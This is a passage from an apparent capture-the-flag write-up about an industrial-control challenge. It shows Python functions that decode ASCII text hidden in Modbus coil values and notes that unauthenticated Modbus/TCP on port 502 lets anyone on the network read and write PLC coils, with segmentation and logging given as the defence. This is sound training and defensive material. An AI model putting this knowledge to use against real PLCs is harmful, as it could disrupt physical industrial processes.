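    do not fill a whole byte are dropped."""
    out = bytearray()
    for k in range(0, len(coils) - len(coils) % 8, 8):
        value = 0
        for bit in coils[k:k + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def decode_coil_text(data_bytes):
    """ASCII hidden in the coils; all-zero trailing bytes are padding from the over-long read."""
    packed = coils_to_bytes(coils_from_response(data_bytes)).rstrip(b"\x00")
    return packed.decode("ascii", "replace")


if __name__ == "__main__":
    print(decode_coil_text(COIL_BYTES))
```

Modbus/TCP carries no authentication, so anything that can reach the PLC's port 502 can read (and write) these coils; network segmentation between the SCADA host and the PLC, plus logging of Modbus function codes at that boundary, is the only control that would have registered this read.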
Originally published on the WeChat official account N0wayBack: First on the net! "Operation Codename: Electric Eel" WP by Chu0